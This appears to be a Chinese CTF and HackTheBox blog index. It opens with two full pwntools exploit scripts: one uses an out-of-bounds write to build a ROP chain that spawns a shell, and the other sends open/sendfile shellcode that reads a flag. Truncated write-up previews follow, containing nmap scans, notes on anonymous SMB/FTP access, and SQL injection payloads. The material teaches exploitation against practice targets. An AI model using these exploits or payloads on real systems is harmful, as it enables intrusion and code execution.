
Vpwn

越界写能改到元素计数器,把它改大之后 edit/show 的下标就能越过数组,实现任意地址读写

写 int 有一定概率成功,要多试几次

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#@Author:X1NRI
import sys
import os
from pwn import*
from ctypes import*
#from LibcSearcher import LibcSearcher

def dbg(command):
	"""Attach gdb to the local target, running `command` as the gdb script.

	Does nothing in remote mode (script invoked as `./x.py HOST PORT`, i.e.
	exactly three argv entries), so breakpoints can stay in the code.
	"""
	remote_mode = len(sys.argv) == 3
	if remote_mode:
		return
	gdb.attach(io, gdbscript=command)
#------------------------------------------------------------------
def menu(num):
	"""Answer the main-menu prompt with option `num`."""
	choice = str(num)
	sla('Enter your choice: ', choice)

def edit(idx, value: int):
	"""Menu 1: overwrite stack element `idx` (0-based) with `value`.

	The index is not bounds-checked by the target (that is the bug), so any
	integer reachable through the counter can be targeted.
	"""
	menu(1)
	answers = (
		('Enter the index to edit (0-based): ', idx),
		('Enter the new value: ', value),
	)
	for prompt, answer in answers:
		sla(prompt, str(answer))

def push(value: int):
	"""Menu 2: append `value` to the target's stack."""
	menu(2)
	text = str(value)
	sla('Enter the value to push: ', text)

def pop():
	"""Menu 3: discard the top element (no further prompt)."""
	return menu(3)
	
def show():
	"""Menu 4: print the stack contents; the exploit parses this output."""
	return menu(4)

def exit():
	"""Menu 5: make the target quit.

	NOTE: this deliberately shadows the builtin `exit`; call `sys.exit()`
	if you ever need to terminate the exploit script itself.
	"""
	return menu(5)

def oow(idx, ptr):
	"""Write the 64-bit value `ptr` as two 32-bit ints into slots idx, idx+1.

	Slot `idx` receives the low dword, slot `idx+1` the high dword, matching
	little-endian layout on the target.

	NOTE(review): the notes above say these writes only succeed some of the
	time. A half with bit 31 set is sent here as an unsigned decimal
	(>= 2147483648); if the target parses it as a signed int that may be the
	cause — TODO confirm against the binary's input parsing.
	"""
	low = ptr & 0xffffffff
	high = ptr >> 32
	edit(idx, low)
	edit(idx + 1, high)

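def pwn():
	"""Leak a libc address through the OOB read, then plant a ROP chain.

	Steps:
	  1. Push six filler values, then 0x20 — the seventh slot presumably
	     overlaps the element counter (see the note at the top of this
	     post), so later edit()/show() indices reach past the array.
	  2. show() prints the (now oversized) stack; tokens 20 and 21 are the
	     low/high dwords of a saved libc return address.
	  3. Write pop-rdi / "/bin/sh" / ret / system over slots 18–25, which
	     are expected to overlap a saved return address; exit() then makes
	     the handler return into the chain.

	Raises RuntimeError if the computed libc base is not page-aligned, i.e.
	the leak was misparsed — better than spraying writes at junk addresses.
	"""
	for _ in range(6):
		push(1)
	push(0x20)
	# Earlier breakpoint used while locating the index: $rebase(0x15C1),
	# idx lived at 0x7fffffffdd70. Current one sits at edit's return.
	# Only attaches gdb on local runs (see dbg()).
	dbg('b *$rebase(0x00000000000017D0)\nc\n')  # edit_ret

	show()
	# Skip the first 20 space-separated tokens; the next two hold the leak.
	for _ in range(20):
		ru(' ', True)
	low = int(ru(' ', True), 10) & 0xffffffff
	high = int(ru(' ', True), 10) & 0xffffffff
	leak = (high << 32) | low
	# 0x29d90 matches __libc_start_call_main+128 in the Ubuntu glibc 2.35
	# builds; re-check against the target's libc if it differs.
	libc.address = leak - 0x29d90
	lg('leak', leak)
	lg('libc', libc.address)
	if libc.address & 0xfff:
		raise RuntimeError(
			'libc base %#x is not page-aligned; leak misparsed?' % libc.address
		)

	system = ls('system')
	rdi = libc.address + 0x000000000002a3e5    # pop rdi ; ret
	binsh = libc.address + 0x00000000001d8678  # "/bin/sh"
	ret = libc.address + 0x0000000000029139    # ret — keeps rsp 16-byte aligned for system()
	lg('rdi', rdi)

	# Each 64-bit value takes two 32-bit slots (see oow()).
	oow(18, rdi)
	oow(20, binsh)
	oow(22, ret)
	oow(24, system)

	# Leaving the menu triggers the return that pops the chain.
	exit()
	itr()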
	
if __name__ == '__main__':
	context(os='linux', arch='amd64', bits=64, endian='little')
	context.terminal = ["tmux", "splitw", "-h", "-l 150"]
	context.log_level = 'debug'
	binary = './pwn'
	elf = ELF(binary)
	libc = elf.libc
	# `./x.py HOST PORT` talks to the remote service; anything else runs ./pwn locally.
	if len(sys.argv) == 3:
		io = remote(sys.argv[1], sys.argv[2])
	else:
		io = process(binary)

	# --- tube shorthands used by the helpers above ---
	def s(payload):
		return io.send(payload)

	def sl(payload):
		return io.sendline(payload)

	def sa(data, payload):
		return io.sendafter(data, payload)

	def sla(data, payload):
		return io.sendlineafter(data, payload)

	def r(num):
		return io.recv(numb=num)

	def ru(data, DROP):
		return io.recvuntil(data, drop=DROP)

	def rl():
		return io.recvline(keepends=True)

	# Grab the last 4/6 bytes up to a typical libc/stack high byte and unpack.
	def uu32():
		return u32(io.recvuntil(b'\xf7')[-4:].ljust(4, b"\x00"))

	def uu64():
		return u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b"\x00"))

	# --- symbol shorthands ---
	def ep(data):
		return elf.plt[data]

	def eg(data):
		return elf.got[data]

	def es(data):
		return elf.sym[data]

	def ls(data):
		return libc.sym[data]

	def itr():
		return io.interactive()

	def ic():
		return io.close()

	# Debug helper: evaluates the expression string `s` and logs its type.
	# Uses eval() on a developer-supplied string — never feed it target output.
	def pt(s):
		return log.info('\033[1;31;40m %s --- %s \033[0m' % (s, type(eval(s))))

	def lg(name, addr):
		return log.success('\033[1;31;40m{} ==> {:#x}\033[0m'.format(name, addr))

	pwn()

Heaven’s+door

限制了syscall的shellcode,只能两次syscall调用

不用绕过也可以:open + sendfile 刚好两次 syscall,就能把 flag 直接送到 stdout

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#@Author:X1NRI
import sys
import os
from pwn import*
from ctypes import*
#from LibcSearcher import LibcSearcher

def dbg(command):
	"""Attach gdb to the local target, running `command` as the gdb script.

	Does nothing in remote mode (script invoked as `./x.py HOST PORT`, i.e.
	exactly three argv entries), so breakpoints can stay in the code.
	"""
	remote_mode = len(sys.argv) == 3
	if remote_mode:
		return
	gdb.attach(io, gdbscript=command)
#------------------------------------------------------------------

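def pwn(idx, ch):
	"""Send an open+sendfile shellcode that copies ./flag to stdout.

	The sandbox described above allows only two syscalls, so the payload is
	exactly open("flag") followed by sendfile(1, fd, NULL, 0x100); no filter
	bypass is required.

	`idx` and `ch` are kept for call-compatibility with the entry point but
	are not used.
	"""
	dbg('b *0x0000000000401709\n')

	# open() leaves the new descriptor in rax; pass that through rather than
	# hard-coding 3, which only holds if 0/1/2 are the sole open fds.
	shellcode = asm(shellcraft.open('flag'))
	shellcode += asm(shellcraft.sendfile(1, 'rax', 0, 0x100))  # 0x100 bytes is enough for a typical flag
	s(shellcode)

	itr()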
	
if __name__ == '__main__':
	context(os='linux', arch='amd64', bits=64, endian='little')
	context.terminal = ["tmux", "splitw", "-h", "-l 150"]
	context.log_level = 'debug'
	binary = './pwn'
	elf = ELF(binary)
	libc = elf.libc
	# `./x.py HOST PORT` talks to the remote service; anything else runs ./pwn locally.
	if len(sys.argv) == 3:
		io = remote(sys.argv[1], sys.argv[2])
	else:
		io = process(binary)

	# --- tube shorthands ---
	def s(payload):
		return io.send(payload)

	def sl(payload):
		return io.sendline(payload)

	def sa(data, payload):
		return io.sendafter(data, payload)

	def sla(data, payload):
		return io.sendlineafter(data, payload)

	def r(num):
		return io.recv(numb=num)

	def ru(data, DROP):
		return io.recvuntil(data, drop=DROP)

	def rl():
		return io.recvline(keepends=True)

	# Grab the last 4/6 bytes up to a typical libc/stack high byte and unpack.
	def uu32():
		return u32(io.recvuntil(b'\xf7')[-4:].ljust(4, b"\x00"))

	def uu64():
		return u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b"\x00"))

	# --- symbol shorthands ---
	def ep(data):
		return elf.plt[data]

	def eg(data):
		return elf.got[data]

	def es(data):
		return elf.sym[data]

	def ls(data):
		return libc.sym[data]

	def itr():
		return io.interactive()

	def ic():
		return io.close()

	# Debug helper: evaluates the expression string `s` and logs its type.
	# Uses eval() on a developer-supplied string — never feed it target output.
	def pt(s):
		return log.info('\033[1;31;40m %s --- %s \033[0m' % (s, type(eval(s))))

	def lg(name, addr):
		return log.success('\033[1;31;40m{} ==> {:#x}\033[0m'.format(name, addr))

	pwn(0, 0x66)

babytrace

3解题

post @ 2025-01-16
post @ 2025-01-14

信息搜集

扫端口

是个域控

PORT      STATE    SERVICE       VERSION
25/tcp    open     smtp?
|_smtp-commands: Couldn't establish connection on port 25
53/tcp    open     domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-14 09:30:17Z)
110/tcp   open     tcpwrapped
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
514/tcp   filtered shell
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
1151/tcp  filtered unizensus
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
49152/tcp open     msrpc         Microsoft Windows RPC
49153/tcp open     msrpc         Microsoft Windows RPC
49154/tcp open     msrpc         Microsoft Windows RPC
49155/tcp open     msrpc         Microsoft Windows RPC
49157/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open     msrpc         Microsoft Windows RPC
49165/tcp open     msrpc         Microsoft Windows RPC
50006/tcp filtered unknown
Aggressive OS guesses: Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 (95%), Microsoft Windows XP SP3 (92%), VMware Player virtual NAT device (92%), Actiontec MI424WR-GEN3I WAP (90%), DD-WRT v24-sp2 (Linux 2.4.37) (90%), Linux 4.4 (88%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=248 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-01-14T09:32:18
|_  start_date: 2025-01-14T04:08:46

再用enum4linux-ng枚举一波信息:

根域服务器,域名 active.htb,FQDN DC.active.htb,操作系统可能是Windows 7、Windows Server 2008 R2;同时SMB允许匿名登录(注意上面 smb2-security-mode 显示签名 enabled and required,所以对这台 DC 做 NTLM relay 行不通):

入侵

SMB匿名登录

post @ 2025-01-13

信息搜集

访问ip,是apache2的默认页面

扫端口

PORT    STATE SERVICE    VERSION
22/tcp  open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_  256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
25/tcp  open  tcpwrapped
|_smtp-commands: Couldn't establish connection on port 25
80/tcp  open  http       Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
110/tcp open  pop3?

扫目录

[16:29:27] Starting: 
[16:29:43] 403 -  276B  - /.ht_wsr.txt                                      
[16:29:43] 403 -  276B  - /.htaccess.bak1                                   
[16:29:43] 403 -  276B  - /.htaccess.orig                                   
[16:29:43] 403 -  276B  - /.htaccess.sample
[16:29:43] 403 -  276B  - /.htaccess.save                                   
[16:29:43] 403 -  276B  - /.htaccess_extra                                  
[16:29:43] 403 -  276B  - /.htaccessBAK
[16:29:43] 403 -  276B  - /.htaccess_sc
[16:29:43] 403 -  276B  - /.htaccessOLD
[16:29:43] 403 -  276B  - /.htaccess_orig
[16:29:43] 403 -  276B  - /.htaccessOLD2                                    
[16:29:43] 403 -  276B  - /.htm                                             
[16:29:43] 403 -  276B  - /.html
[16:29:43] 403 -  276B  - /.httr-oauth                                      
[16:29:43] 403 -  276B  - /.htpasswd_test
[16:29:43] 403 -  276B  - /.htpasswds                                       
[16:29:48] 403 -  276B  - /.php                                             
[16:31:51] 403 -  276B  - /server-status                                    
[16:31:51] 403 -  276B  - /server-status/                                   
                                                                             
Task Completed

打波poc

什么都没扫出来,但是我注意到一个奇怪的端口 161/udp(SNMP)——它是 UDP 服务,上面的 TCP 扫描不会列出,要用 nmap -sU 才能看到

入侵

研究-SNMP服务


题目描述:一个看似健康的IOT服务

基本信息

给了libc,libc2.33-0ubuntu5_amd64

逆向分析

  • 主函数

  • 处理请求正文

要注意的是其中有一个check:

这个全局变量默认为0

add : 1&index&size&content
edit : 2&index&content
show : 3&index
free : 4&index
post @ 2025-01-09

信息搜集

初识

访问ip

上面的选项都点不了

扫端口

PORT      STATE    SERVICE         VERSION
22/tcp    open     ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCjEtN3+WZzlvu54zya9Q+D0d/jwjZT2jYFKwHe0icY7plEWSAqbP+b3ijRL6kv522KEJPHkfXuRwzt5z4CNpyUnqr6nQINn8DU0Iu/UQby+6OiQIleNUCYYaI+1mV0sm4kgmue4oVI1Q3JYOH41efTbGDFHiGSTY1lH3HcAvOFh75dCID0564T078p7ZEIoKRt1l7Yz+GeMZ870Nw13ao0QLPmq2HnpQS34K45zU0lmxIHqiK/IpFJOLfugiQF52Qt6+gX3FOjPgxk8rk81DEwicTrlir2gJiizAOchNPZjbDCnG2UqTapOm292Xg0hCE6H03Ri6GtYs5xVFw/KfGSGb7OJT1jhitbpUxRbyvP+pFy4/8u6Ty91s98bXrCyaEy2lyZh5hm7MN2yRsX+UbrSo98UfMbHkKnePg7/oBhGOOrUb77/DPePGeBF5AT029Xbz90v2iEFfPdcWj8SP/p2Fsn/qdutNQ7cRnNvBVXbNm0CpiNfoHBCBDJ1LR8p8k=
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGKC3ouVMPI/5R2Fsr5b0uUQGDrAa6ev8uKKp5x8wdqPXvM1tr4u0GchbVoTX5T/PfJFi9UpeDx/uokU3chqcFc=
|   256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJbkxEqMn++HZ2uEvM0lDZy+TB8B8IAeWRBEu3a34YIb
25/tcp    open     smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp    open     http            Apache httpd 2.4.41 ((Ubuntu))
|_http-title:  Emergent Medical Idea
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)

扫目录

[16:44:13] Starting: 
[16:44:25] 403 -  277B  - /.ht_wsr.txt                                      
[16:44:28] 403 -  277B  - /.htaccess_extra                                  
[16:44:28] 403 -  277B  - /.htaccessOLD                                     
[16:44:28] 403 -  277B  - /.htaccess.orig                                   
[16:44:28] 403 -  277B  - /.htaccessOLD2                                    
[16:44:28] 403 -  277B  - /.htaccess.sample                                 
[16:44:28] 403 -  277B  - /.htaccess.save
[16:44:28] 403 -  277B  - /.htaccessBAK
[16:44:28] 403 -  277B  - /.htaccess_orig
[16:44:28] 403 -  277B  - /.htm
[16:44:28] 403 -  277B  - /.htaccess_sc                                     
[16:44:28] 403 -  277B  - /.html
[16:44:28] 403 -  277B  - /.htaccess.bak1                                   
[16:44:28] 403 -  277B  - /.htpasswd_test                                   
[16:44:28] 403 -  277B  - /.htpasswds                                       
[16:44:28] 403 -  277B  - /.httr-oauth
[16:46:22] 403 -  277B  - /server-status                                    
[16:46:22] 403 -  277B  - /server-status/   

目录也没东西

打波poc

post @ 2025-01-04

信息搜集

访问ip

在hosts添加两行

10.10.11.227 tickets.keeper.htb
10.10.11.227 keeper.htb

访问 tickets.keeper.htb/

访问一下 keeper.htb/, 就是之前跳转的界面

扫端口

先简单扫下端口

PORT      STATE    SERVICE
22/tcp    open     ssh
| ssh-hostkey:
|   256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
|_  256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
25/tcp    open     smtp
|_smtp-commands: Couldn't establish connection on port 25
37/tcp    filtered time
80/tcp    open     http
| http-methods:
|_  Supported Methods: GET HEAD
|_http-title: Site doesn't have a title (text/html).
110/tcp   open     pop3
125/tcp   filtered locus-map
444/tcp   filtered snpp
514/tcp   filtered shell
1105/tcp  filtered ftranhc
1233/tcp  filtered univ-appserver
1840/tcp  filtered netopia-vo2
2107/tcp  filtered msmq-mgmt
2251/tcp  filtered dif-port
2399/tcp  filtered fmpro-fdal
3827/tcp  filtered netmpi
3871/tcp  filtered avocent-adsap
5033/tcp  filtered jtnetd-server
5357/tcp  filtered wsdapi
5560/tcp  filtered isqlplus
5877/tcp  filtered unknown
5961/tcp  filtered unknown
6502/tcp  filtered netop-rc
7070/tcp  filtered realserver
8254/tcp  filtered unknown
9000/tcp  filtered cslistener
9002/tcp  filtered dynamid
9900/tcp  filtered iua
16113/tcp filtered unknown
22939/tcp filtered unknown
49999/tcp filtered unknown

入侵

post @ 2025-01-01

信息搜集

80是个登录界面,PRTG?

扫端口

PORT      STATE    SERVICE        VERSION
21/tcp    open     ftp            Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_11-10-23  09:20AM       <DIR>          Windows
80/tcp    open     http           PRTG/18.1.37.13946
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: PRTG/18.1.37.13946
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 36B3EF286FA4BEFBB797A0966B456479
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
135/tcp   open     msrpc?
139/tcp   open     netbios-ssn?
445/tcp   open     microsoft-ds?
668/tcp   filtered mecomm
1051/tcp  filtered optima-vnet
1071/tcp  filtered bsquare-voip
3527/tcp  filtered beserver-msg-q
3809/tcp  filtered apocd
7019/tcp  filtered doceri-ctl
48080/tcp filtered unknown
49400/tcp filtered compaqdiag

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-12-28T14:09:28
|_  start_date: 2024-12-28T14:05:11
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

这一看ftp可以匿名登录;另外 SMB 签名只是 enabled but not required,这台机器也是 NTLM relay 的潜在目标

入侵

ftp 匿名登录

可以登录上去,不过权限较低,无法上传文件

发现iis的网站目录 inetpub/

但是进去发现什么都没有?

post @ 2024-12-28

靶场地址:BUUCTF在线评测

level 1

GET传参 ?id=1

传参2回显不同,说明传入的参数是会进入数据库语句的

1' 单引号报错,说明引号破坏了 SQL 语法、输入确实进入了查询;如果报错信息原样回显到页面上,就还可以进一步做报错注入

1'--+

可以判断出是字符型且存在SQL注入

联合查询爆出列数,3列能正常回显

1'UNION SELECT 1,2,3--+
